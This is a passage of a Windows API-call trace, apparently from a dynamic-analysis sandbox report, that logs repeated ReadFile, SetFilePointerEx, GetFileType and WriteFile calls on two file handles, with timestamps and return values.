(_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.868] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.868] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.869] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.869] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.870] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.870] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.871] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.871] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] GetFileType (hFile=0x50) returned 0x1 [0129.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.872] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.872] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.873] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] GetFileType (hFile=0x50) returned 0x1 [0129.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.873] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.873] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.874] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] GetFileType (hFile=0x50) returned 0x1 [0129.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.874] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.874] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.875] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.875] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 